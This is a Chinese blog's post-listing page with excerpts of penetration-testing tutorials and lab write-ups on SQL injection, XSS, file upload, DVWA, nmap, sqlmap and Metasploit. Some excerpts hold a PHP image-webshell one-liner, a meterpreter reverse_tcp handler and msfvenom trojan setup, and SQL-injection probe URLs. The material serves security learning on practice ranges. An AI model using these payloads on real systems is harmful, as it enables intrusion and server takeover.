自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(25)
  • 收藏
  • 关注

原创 第5章 域内横向移动分析及防御

域内横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁(Advanced Persistent Threats,APT中。攻击者会利用该技术,以被攻陷的系统为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。

2022-10-31 15:34:29 1609 1

原创 第四章 权限提升分析及防御

在 Windows中,权限大概分为四种、分别是User、Administrator、System、TrustedInstaller。

2022-10-31 15:15:02 1438

原创 第三章 隐藏通信隧道技术

在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。

2022-10-31 15:00:55 2560

原创 第二章 内网信息收集

内网信息收集

2022-10-31 14:11:33 994

原创 第一章 内网渗透基础

内网渗透基础

2022-10-31 14:08:24 684

原创 ATT&CK红队评估实战靶场(一)靶场搭建和模拟攻击过程全过程

ATT&CK红队评估实战靶场(一)0x01 前言本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@20190x02 环境搭建WEB服务器:windows7系统外网网卡IP:192.168.31.59内网网卡IP:192.168.52.143

2021-09-30 09:21:56 3000

原创 sqli-labs lesson 5-10 通关 解析 学习sql注入

前言:可以设置 sql语句显示在网页 方便对照学习 设置方法参考我的另一篇博客文章最后-tip小技巧https://blog.csdn.net/weixin_44286136/article/details/110822914需要了解sql盲注各种函数知识的看我的另一篇博客 sql注入需要了解的函数知识Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)1.测试发现,当输入?id=2时页面显示正常http:/

2021-06-05 15:43:34 372

原创 文件上传 webshell 各类型 一句话木马 图片马 制作 教程

webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。小马:一句话木马也称为小马,即整个shell代码量只有一行,一般时系统执行函数大马:代码量和功能比小马多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到图片马:

2021-06-05 15:42:53 11611

原创 XSS 跨站脚本攻击 构造各种类型脚本 理论和实战 反射型 储存性型 和 beEF 自动攻击

1.XSS简介和原理解析1.1 XSS相关概念 跨站脚本(Cross SiteScript)为了避免与样式CSS混淆,所以简称XSS XSS是经常出现在Web应用程序中的计算机安全漏洞,也是web中最主流的攻击方式,那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 如,盗取用户Cook

2021-05-20 21:39:10 488

原创 新手指南 DVWA low 低级别 介绍

DVWA 有很多模块。如下所示我们选中low,然后SuBmit首先看目录1.Brute Force(暴力破解)2.Command Injection(命令行注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Upload(文件上传)6.Insecure CAPTCHA (不安全的验证码)7.SQL Injection(SQL注入)8.SQL Injection(Blind)(SQL盲注)9.XSS(Reflected)(反射型跨站脚本)10.

2021-05-20 21:38:52 540

原创 mysql数据库sql注入各种函数必须知道的知识

数据库名:database()数据库版本: version()数据库用户: user()操作系统: @@version_compile_os系统用户名: system_user()当前用户名: current_user连接数据库的用户名:session_user()读取数据库路径:@@datadirMYSQL安装路径:@@basedir储存所有表名信息的表 : information_schema.tables表名 : table_name数据库名: table_schema列名 :

2021-05-20 21:31:59 615 1

原创 mysql 中的 SCHEMATA 表

SCHEMATA在MySQL中,SCHEMA是数据库,因此SCHEMATA表提供有关数据库的信息。SCHEMATA表有以下列:CATALOG_NAME :SCHEMA所属目录的名称。该值始终为def。SCHEMA_NAME :SCHEMA名称DEFAULT_CHARACTER_SET_NAME:SCHEMA默认字符集DEFAULT_COLLATION_NAME :SCHEMA字符集排序规则SQL_PATH :此值始终为NULL。select schema_name from informa

2021-05-20 21:31:38 2011

原创 sql 注入的基本语句 种类 分类 流程

sql注入是什么?SQL注入攻击是利用网站程序漏洞,通过提交恶意构造的SQL语句,以达到窃 取、修改、破坏数据库为目的的攻击。可以用来注入的地址,比如说某个请求会发送某个参数,而这个参数在后台用于作为数据库查询的拼接字段,且未完全过滤,那么这个点就有可能是一个注入点注入点类型来分类数字型注入点当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。1)加单引号,URL:http://xxx.xx:xxxx/new_list.php?id=1’ 对应的sql:select * fromt

2021-05-20 21:31:11 214

原创 dvwa File Inclusion(文件包含) 低中高各个级别介绍及破解过程

本地文件包含http://192.168.0.8/dvwa/vulnerabilities/fi/?page=/etc/passwd 类似本地文件包含+webshell1.制作一句话木马 1234.jpg 推荐软件 edjpgcom<?fputs(fopen("shell.php","w"),'<?php eval($_POST[admin]);?>')?>2.上传图片木马文件3.执行文件包含 并产生后门4.通过菜刀连接...

2021-05-19 17:27:17 1039

原创 墨者学院 布尔盲注

1.打开靶场,寻找注入点。2.判断注入点类型http://219.153.49.228:44109/new_list.php?id=1’ and 1=1http://219.153.49.228:44109/new_list.php?id=1 and 1=1 --+输入 字符返回空白 数字正常 判断这个id的值类型是数字类型3.判断数据库名字的长度 ,1,2,3…内容空白。一直试,试到长度为10http://219.153.49.228:44109/new_list.php?id=

2021-05-19 17:26:55 138

原创 web 信息收集 之 nmap工具 目标扫描

1、nmap1.1 nmap简介Nmap是安全渗透最强大的开源四端口扫描器,能跨平台支持运行https://nmap.org/http://sectools.org/1.2 扫描示例主机发现 nmap -sn 192.168.106.134/24端口扫描 nmap -sS -p1-1000 192.168.106.134/24系统扫描 nmap -O 192.168.106.134/24版本扫描 nmap -sV 192.168.106.134/24综合扫描 nmap -A 1

2021-05-19 17:26:19 338

原创 web 信息收集 之 搜索引擎

一、信息收集概述1.web信息收集(探测)即web踩点,只要掌握目标web服务的方方面面,是实现web渗透入侵前的准备工作。2.web踩点内容包括操作系统,服务器类型,数据库类型,web语言,域名信息,网站目录。3.web信息收集涉及搜索引擎,往账扫描,指纹识别等工作。二、项目环境:目标靶机,owasp_Broken_web_Apps_vM_1.2测试渗透机:win7/kali三、google Hacking3.1 site功能:搜索制定的域名的网页内容,可以用来搜索子域名,更此域名相关

2021-05-19 17:25:56 431

原创 sqli-labs lesson 11-15 通关 解析 学习sql注入

lesson 11

2021-05-19 17:25:27 347

原创 sqli-labs lesson 1-4通关 解析 学习sql注入

lesson 1![在这里插入图片描述](https://img-blog.csdnimg.cn/20201207164538455.png = 200x150)![在这里插入图片描述](https://img-blog.csdnimg.cn/20201207164538455.png width=“20%”)判断是否存在sql注入漏洞

2021-05-19 17:24:01 224

原创 sqlmap 注入教程 常用命令大全

sqlmap 官网:http://sqlmap.org/sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage–hh 帮助手册 详细sqlmap.py -u “注入地址” --dbs // 列举数据库sqlmap.py -u “注入地址” --current–db // 当前数据库sqlmap.py -u “注入地址” --users // 列数据库用户sqlmap.py -u “注入地址” --c

2021-05-19 17:22:00 1322

原创 文件上传漏洞 upload-labs 靶场

Pass-01源码function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif";

2021-05-19 17:05:03 284

原创 msf 获取一个普通的session 控制windows

msf 获取session在kali终端中打开msfconsole控制台开启监听use exploit/multi/handler设置tcp监听set payload windows/meterpreter/reverse_tcp再次开启一个终端进行(shift+ctrl+T),查看本机ip利用msfvenom制作木马程序说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell-e 编码方式-i 编码次数-b 在生成的程序

2021-05-19 17:03:08 2741

原创 sqli-labs sql注入漏洞学习平台 靶场 安装 和小技巧

小技巧在文章最后 页面显示sql语句 方便学习sqli-lab下载地址:https://github.com/Audi-1/sqli-labsweb环境搭建:在安装靶场之前,我们还需要搭建web运行环境:这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:下载地址下载后安装即可sqli-lab靶场搭建:将下载的sqli-lab压缩包解压到phpstudy的网站根目录中接着修改数据库配置文件如下:phpstudy默认的m

2020-12-07 17:43:28 623

原创 phpStudy自带mysql和本地mysql冲突 解决办法

phpStudy自带有MySQL,而你原本就已经安装了MySQL,如果它们同时启动的话就会产生冲突,MySQL无法正常运行前言:如果你安装好phpstudy,服务里mysql 服务没了,本地的mysql也启动不了解决方法: 以管理员的身份打开cmd进入到 mysql 安装路径下的bin目录执行 mysqld --install要以管理员的身份 不然会报Install/Remove of the Service Denied!的错误就可恢复 mysql 服务接下来再解决 DVWA环境 phpSt

2020-11-18 22:01:31 6356

原创 windows下DVWA 渗透测试环境搭建

今天尝试了在windows下搭建一个DVWA,记录一下安装过程DVWA是在httpd,PHP,MYSQL,Apache的基础上来运行的phpstudy集成了DVWA需要的所有环境开始搭建:首先下载phpstudy和DVWAphpstudy: https://www.xp.cn/download.htmlDVWA: http://www.dvwa.co.uk/一、安装phpstudy1.将上面链接下载下来的压缩包解压 运行安装程序注意:安装路径不能包含中文,我个人直接安装在F:\phpSt

2020-11-18 22:00:50 276

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除